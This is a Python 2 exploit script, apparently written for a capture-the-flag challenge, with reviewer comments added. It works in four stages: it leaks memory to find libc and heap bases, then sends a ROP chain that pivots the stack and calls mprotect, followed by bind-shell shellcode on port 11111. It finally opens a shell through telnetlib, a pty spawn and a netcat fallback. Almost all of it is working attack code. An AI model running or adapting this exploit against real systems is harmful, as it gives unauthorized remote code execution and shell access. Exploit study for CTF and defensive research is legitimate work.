#!/usr/bin/env python2
# Exploit for gbr's challenge
# Written by Maycon Maia Vitali ( maycon at hacknroll dot com )
# Hack N' Roll
import socket, struct, sys, os
import telnetlib
# NOTE(review): Python 2 only (print statements, xrange, str-as-bytes, integer
# `/` in the leak parsing below) -- the shebang above says python2 as well.
# The script talks to the challenge service in four separate TCP connections
# ("stages"); every numeric offset below is a hard-coded constant, presumably
# tied to the exact binary/libc build this was written against -- confirm
# before reading anything into the values.
PROT_RWX = 0x7
# 32-bit packing helpers.  Note the asymmetry: pack() uses native byte order
# and size ('I'), unpack() is explicitly little-endian 4-byte ('<L').
pack = lambda x : struct.pack('I', x)
unpack = lambda x : struct.unpack('<L', x)[0]
if len(sys.argv) != 3:
    print "Use: %s <host> <port>" % (sys.argv[0])
    sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])
for stage in xrange(1,5):
    print "[>] Sending %d%s stage..." % (stage, ['st', 'nd', 'rd', 'th'][stage - 1])
    # NOTE(review): a fresh socket per stage; none of them is ever closed
    # (no close()/with), so they live until interpreter exit.
    s0ck = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s0ck.connect((host, port))
    if stage == 1:
        # Stage 1: send an oversized "jigcsaw1:" message and read up to 1024
        # bytes back.  The reply is treated as a sequence of 32-bit words.
        # `buff` receives send()'s byte count and is never used.
        buff = s0ck.send("jigcsaw1:" + "A"*491)
        print "[<] Reading leaked data from server..."
        recv = s0ck.recv(1024)
        # Py2 integer division; any trailing partial word is dropped.
        leak_word = [unpack(recv[4 * i : 4 * (i+1)]) for i in xrange(len(recv)/4)]
        #print "[+] Leaked: 0x%08x 0x%08x 0x%08x 0x%08x" % (
        # leak_word[0], leak_word[1], leak_word[2], leak_word[3]
        # )
        # Words 0 and 2 have their low 12 bits cleared (4 KiB alignment) and a
        # fixed offset subtracted to derive the two base addresses that stages
        # 2 and 3 build on.  NOTE(review): a reply shorter than 12 bytes makes
        # leak_word[2] raise IndexError -- there is no length check here.
        base_libc = (leak_word[0] & 0xfffff000) - 0x1b3000
        base_heap = (leak_word[2] & 0xfffff000) - 0x4000
        print "[+] Found libc base address @ 0x%08x" % base_libc
        print "[+] Found heap base address @ 0x%08x" % base_heap
    elif stage == 2:
        # Stage 2: second "jigcsaw1:" message carrying padding, the ROP chain
        # built from the stage-1 bases, the shellcode, and "B" filler up to a
        # fixed 450-byte body.
        # Padding
        padding = "@" * 44
        # Bind shell.  NOTE(review): the original comment said port 4444, but
        # stage 4 connects to port 11111 (and 0x2b67 == 11111 appears in the
        # bytes below), so "4444" looks stale.
        bindshell = (
            "\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a\x02\x89\xe1\xcd\x80"
            "\x5b\x5e\x52\x66\x68\x2b\x67\x6a\x10\x51\x50\xb0\x66\x89\xe1"
            "\xcd\x80\x89\x51\x04\xb0\x66\xb3\x04\xcd\x80\xb0\x66\x43\xcd"
            "\x80\x59\x93\x6a\x3f\x58\xcd\x80\x49\x79\xf8\xb0\x0b\x68\x2f"
            "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\xcd\x80"
        )
        # libc-relative offsets; build-specific (see note at top of file).
        PIVOTING = 0x2cf30
        MPROTECT = 0xe35a0
        # ROP gadgets: one pivot address, then the mprotect address followed by
        # its return address and three arguments (addr, len, prot).
        rop = (
            # Pivoting
            pack(base_libc + PIVOTING) + # add esp, 0xa4 ; pop ebx ; pop edi ; ret
            # Ret2Libc
            pack(base_libc + MPROTECT) + # mprotect(*addr, len, prot)
            pack(base_heap + 0x5665) + # Return to bindshell
            pack(base_heap) + # Heap address
            pack(0x25000) + # length
            pack(PROT_RWX) # rwx
        )
        print "[+] Pivoting @ 0x%08x" % (base_libc + PIVOTING)
        print "[+] Calling mprotect() @ 0x%08x" % (base_libc + MPROTECT)
        payload = (
            "jigcsaw1:" +
            padding +
            rop +
            bindshell +
            "B" * (450 - len(padding) - len(rop) - len(bindshell))
        )
        # Both return values are unused; the recv() only drains the reply.
        buff = s0ck.send(payload)
        recv = s0ck.recv(1024)
    elif stage == 3:
        # Stage 3: "jigcsaw2:" message carrying a single packed heap address
        # (a fixed offset from the stage-1 heap base).  No reply is read.
        pivot_addr = base_heap + 0x564d
        print "[+] Pivotting address @ 0x%08x" % (pivot_addr)
        s0ck.send("jigcsaw2:" + pack(pivot_addr))
    elif stage == 4:
        # Stage 4: the challenge port is no longer used; the script connects
        # to port 11111 on the same host with telnetlib, writes the command
        # block below, and hands the session to the user with interact().
        print "[+] Shell?"
        pty = """
id
uname -a
python -c "import pty;pty.spawn('/bin/bash')"
"""
        s = telnetlib.Telnet(host, 11111)
        s.write("%s\n" % pty)
        s.interact()
        # Fallback once interact() returns.  NOTE(review): `host` comes
        # straight from argv and is interpolated into a shell string; a
        # subprocess call with an argument list would avoid shell parsing.
        os.system("nc %s 11111" % (host))
# Block on one byte of stdin before exiting.
sys.stdin.read(1)